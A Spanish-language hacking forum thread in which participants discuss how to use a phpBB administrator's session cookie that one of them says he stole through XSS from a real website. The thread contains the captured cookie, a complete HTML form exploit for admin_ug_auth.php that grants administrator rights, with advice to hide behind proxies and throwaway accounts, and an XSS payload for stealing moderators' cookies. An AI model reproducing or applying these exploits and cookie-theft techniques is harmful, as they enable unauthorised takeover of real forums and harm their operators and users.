Duda cookies en foros phpbb

[Rojodos]

Sabeis si en los foros phpbb se guarda en la cookie el pass del usuario??
Esq tngo cierta cookie de un admin de un foro de phpbb (sacada por XSS) pero no se realmente usarla...

He probado a cambiar la mia, poniendo la cookie del admin, pero al entrar en el foro, sigo saliendo yo como usuario....

Se pueden desencriptar la cookie?

Aki la teneis, sin la parte final que hace referencia al sitio dnd la saque (bastante importante y conocida la web ):

-------------------

phpbb2mysql_sid=215d1ec8809c864dcc821083f5f098bc;p hpbb2mysql_t=a%3A1%3A%7Bi%3A1037813838%3B%7D;phpbb 2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22% 3Bs%3A32%3A%220f97e6b84e72307bb0856277f7610b6%22%3 Bs%3A6%3A%22userid%22%3Bi%3A337%3B%7D
victima.com/
1024
3563211904
29601676
3407782336
29528259
*
--------------------------------



En fin, necesito vuesta ayuda....

[CrAcKzMe]

bufff.....esq es una matada.

supongo q esto phpbb2mysql_sid=215d1ec8809c864dcc821083f5f098bc;p es la direccion mysql del sitio encriptada

y esto hpbb2mysql_t=a%3A1%3A%7Bi%3A1037813838%3B%7D;phpbb
2......joer nose, la tabla?

A partir de aqui la info del login.Parece encriptado con unicode , ese es el user: %22%3Bi%3A337%3B%7D

mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%
3Bs%3A32%3A%220f97e6b84e72307bb0856277f7610b6%22%3
Bs%3A6%3A%22userid%22%3Bi%3A337%3B%7D
victima.com/

Supongo q a partir de aqui viene la pass encriptada.....pero ahora quien es el chulo q la desencripta XD. Con esa cookie metida en la carpeta de cookies te deja entrar como admin?? Intenta borrar antes todas las cookies excepto esta.
1024
3563211904
29601676
3407782336
29528259

[TseTse]

Sobre Windows NT/2K/XP y cookies. Como dato, te digo que en estos sistemas, la cookie pilla este nombre: usuariodewin@nombrecookie.
Si tu usuario se llama pepe y la cookie que has pillao tiene el usuario juan, tendrás que crearte el usuario juan o probar a cambiar el nombre de juan por pepe.

TseTse

[CrAcKzMe]

no hace falta tanta historia, tansolo q seas el admin de tu propio sistema (tengo q preguntar algo? XD) y puedes manejar los archivos a tu libre albedrio.

[half]

Yo solo observo

[01decowar]

Bueno, no es bien bien la respuesta a tu pregunta, pero en los foros de phpbb 2.0 puedes obtener privilegios de administrador aprovechandote de un bug. Aqui os lo dejo:

Este bug se basa en obtener permisos de Administrador (borrar, crear, editar foros y posts, ver stats, etc.) mediante un error de programacion en el fichero admin_ug_auth.php (el usado por el sistema para los permisos).

DATOS NECESITADOS

Para lograr los permisos de administrador necesitamos dos datos:

1.- EL lugar donde se encuentra instalado el phpBB, generalmente http://www.sitioafectado.com/phpBB/, si utilizamos un poquito de logica cada quien sabra donde esa.

2.- Necesitas estar registrado (Es bueno crear un cuenta nueva, que no te vincule de ninguna manera y utilizar proxies). Suponiendo que ya te has registrado vas a la lista de miembros (hay un link en el foro en las cabeceras que dice MemberList si el foro esta en ingles o Miembros si esta en espanol) y localizas tu Nombre de Usuario, luego le haces clic y en la pagina que se abrira te fijas en tu barra de direcciones y veras que al final de ella un numero, este sera tu numero de usuario.

Ej.: http://www.sitioafectado.com//phpBB2/profile.php?mode=viewprofile&u=5384

En este ejemplo el 5384 seria tu numero de usuario.

VAMOS A ACTUAR

Ahora tendremos que crear un archivo HTML localmente.

Escribes este codigo en Notepad (windows) o en Kate o Kwrite {Linux}

#html>
#head>
#/head>
#body>
#form method="post"
action="http://www.sitioafectado.com/directorio_del_phpbb/admin/admin_ug_auth.php">
Nivel de Usuario: #select name="userlevel">
#option value="admin">Administrador#/option>
#option value="user">Usuario#/option>#/select>
#input type="hidden" name="private[1]" value="0">
#input type="hidden" name="moderator[1]" value="0">
#input type="hidden" name="mode" value="user">
#input type="hidden" name="adv" value="">
Numero de Usuario: #input type="text" name="u" size="5">
#input type="submit" name="IR" value="IR">
#/form>
#center>#p> Script obtenido de SecurityBugWare. Modificado#br>
y traducido al castellano por SuEn#/p>#/center>
#/body>
#/html>

NOTA: Para que esto funcione tienes que sustituir los "#" por "<".

Tienes que saber que tienes que modificar la direccion que te he puesto de ejemplo en el codigopor la direccion original del sitio afectado y el directorio del phpBB.

Lo guardamos con el nombre que quieras pero con la extension .html. Luego lo abrimos con un explorador web (Mozilla, Konkeror, Iexplore, Netscape, etc.) y veras que te aparece un formulario donde se te pide el el numero de usuaio (el que obtuvimos mas arriba), lo introduces y haces clic donde dice IR.

Veremos que nos aparece la pagina afectada con y un formulario de login, aqui no tienes que introducir tu nombrbe de usuario ni nada, tenemos que hacer clic donde dice login en la cabecera del foro, y en la pagina que se carga introducimos nuestro nombre de usuario y password.

Ahora te aparece el indice del foro, al final del foro veremos que nuestro nick esta de color NARANJA (generelamente), eso indica que ya tenemos los permisos de administracion.

Para probar esto, nos dirijimos a uno de los foros, hacemos clic en un post y hacemos clic en el boton de "Edit" para modificar un mensaje, escribimos lo que sea y le damos a Submit y si todo a funcionado veremos que el post se ha modificado.

Ya eres administrador.

[Rojodos]

Ese bug ya lo sabia (esta en mi foro) y por mas que lo he probado en foros phpbb 2.0.0 (google ----> "powered by phpbb 2.0.0") no funciona.

El bug que he utilizado para los foros phpbb acaba de salir en el bugtraq (tse tse, lo tienes que haber leido) y al probarlo, a la primera funciono, en un phpbb 2.0.6 (creo).

AL final tndre que desencriptar la cookie, parece que son caracteres Unicode (gracias Crackzme)

Un saludo

[CrAcKzMe]

si sacas algo nos lo cuentas

[TseTse]

Rojodos te refieres a esto?
http://www.rootsecure.net/index.pl?menuitem=exploit_code

A mí me ha funcionado en la mayoría de sitios.

TseTse

[Rojodos]

Nop, ese no es


Es a traves de XSS:

Aki va:

-----------------------------------------------
Vulnerable systems:

The Last version of phpbb

Exploit:

http://phpbb.com/phpBB/viewtopic.php?

t=17071&highlight=">"<Scr*ipt>javascript:alert(doc ument.cookie)</Scr*ipt>



(without "*")


-------------------------------------

Vas a un post que haya puesto el moderador y ya tienes so cookie....